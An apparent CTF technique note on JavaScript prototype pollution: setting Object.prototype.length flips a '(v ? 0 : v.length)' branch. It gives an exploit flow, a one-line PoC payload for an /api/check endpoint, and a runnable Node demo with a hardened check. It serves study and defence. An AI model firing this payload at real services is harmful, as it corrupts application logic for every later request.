web javascript prototype-pollution logic-bug truthiness

Flip a branch like (v ? 0 : v.length) by setting an inherited length through prototype pollution.

Truthy / Falsy Logic Bug + Object.prototype.length Pollution

The vulnerable expression trusts JS truthiness and property lookup more than it should. In (v ? 0 : v.length) the falsy branch reads length off a value the author assumed has none. Falsy primitives such as 0, false and NaN are boxed for property access and inherit from Object.prototype, so once an inherited length exists, a branch that seemed to depend on a "missing length" becomes attacker-controlled.

Why It Works

  • length resolves up the prototype chain. A value with no own length (a plain object, or a boxed primitive like 0 or false) falls through to Object.prototype, so polluting Object.prototype.length changes what v.length returns and therefore which branch the caller takes. Strings are unaffected: their own length shadows the inherited one.

Vulnerable Pattern

  • Expressions like (v ? 0 : v.length), shorthand truthiness checks, or use of length on values that may not be arrays/strings.

Exploit Flow

  1. Identify the exact value type reaching the check and whether property access on it still walks the prototype chain (objects and boxed primitives such as 0 or false do; null and undefined throw a TypeError instead).
  2. Set Object.prototype.length (or another inherited property the check reads) through the allowed code-evaluation surface.
  3. Re-run the check and observe the branch flip: v.length now returns the polluted value instead of undefined.

Variations

  • Inherited valueOf, toString, constructor, or other fields used implicitly in logic checks.

Common Blockers

  • Code running in a frozen realm (Object.freeze(Object.prototype)), a strict sandbox that removes prototype mutation, or the checked value being null or undefined, which are not boxed and throw a TypeError on v.length before the prototype is ever consulted. A string value is also a dead end, since its own length shadows the inherited one.

PoC Sketch

/api/check?v=!(Object.prototype.length=1)

The single expression does both jobs: the assignment pollutes Object.prototype.length, and negating its result yields false, a falsy value. The check takes the falsy branch and false.length now resolves to the inherited 1 instead of undefined.
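The flow and the PoC sketch above as one runnable, added example; this is not code from the original page or the referenced challenge. vulnerableCheck, hardenedCheck, demonstrate, throwsEvenWhenPolluted and simulateEndpoint are hypothetical names, and simulateEndpoint stands in for an /api/check handler that evaluates its query value, which the page does not show.

```javascript
// Added example (not the original page's or the challenge's code): a minimal
// model of the vulnerable check, the pollution that flips its falsy branch,
// and a hardened variant. All function names and the simulated endpoint are
// hypothetical.

// Vulnerable: when v is falsy, length is read off v. Falsy primitives such as
// 0, false and NaN are boxed for property access and inherit from
// Object.prototype, so an inherited length is picked up.
function vulnerableCheck(v) {
  return v ? 0 : v.length;
}

// Hardened: on the falsy branch, only trust an own length (e.g. the empty
// string's), never one inherited through the prototype chain, and never
// dereference null or undefined.
function hardenedCheck(v) {
  if (v) return 0;
  if (v == null || !Object.hasOwn(v, 'length')) return undefined;
  return v.length;
}

// Runs both checks on one falsy value before, during and after pollution so
// the flip is visible as returned data rather than printed output.
function demonstrate(v) {
  const probe = () => ({ vulnerable: vulnerableCheck(v), hardened: hardenedCheck(v) });
  const before = probe();
  Object.prototype.length = 1; // step 2 of the flow, modelled as a direct assignment
  let during;
  try {
    during = probe();
  } finally {
    delete Object.prototype.length; // leave the process clean for whatever runs next
  }
  return { before, during, after: probe() };
}

// Common blocker: null and undefined are not boxed, so v.length throws a
// TypeError instead of falling through to the prototype, polluted or not.
// Returns the error name, or null if the check did not throw.
function throwsEvenWhenPolluted(v) {
  Object.prototype.length = 1;
  try {
    vulnerableCheck(v);
    return null;
  } catch (e) {
    return e.name;
  } finally {
    delete Object.prototype.length;
  }
}

// Hypothetical stand-in for the PoC sketch's endpoint: the query value is
// evaluated and the result is fed to the vulnerable check. The real handler
// is not shown on the page.
function simulateEndpoint(payload) {
  try {
    const v = eval(payload); // the "allowed code-evaluation surface"
    return vulnerableCheck(v);
  } finally {
    delete Object.prototype.length;
  }
}

console.log(demonstrate(0));
// before: vulnerable undefined; during: vulnerable 1, hardened undefined; after: vulnerable undefined
console.log(demonstrate(''));                                   // own length 0 shadows the inherited 1
console.log(throwsEvenWhenPolluted(null));                      // TypeError
console.log(simulateEndpoint('!(Object.prototype.length=1)'));  // 1: pollutes, then evaluates to false
```

Run it with node. The pollution is undone in a finally block after every probe so the rest of the process is not left with a polluted Object.prototype; in a real target there is no such cleanup, which is why a single request can change the behaviour of every later request served by the same process.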

Good Situations To Use It

  • A branch relies on truthiness/length of an untyped value.
  • You can pollute Object.prototype.
  • The realm isn't frozen.

Sources

  • labossi_2026/web/how_well_do_you_know_js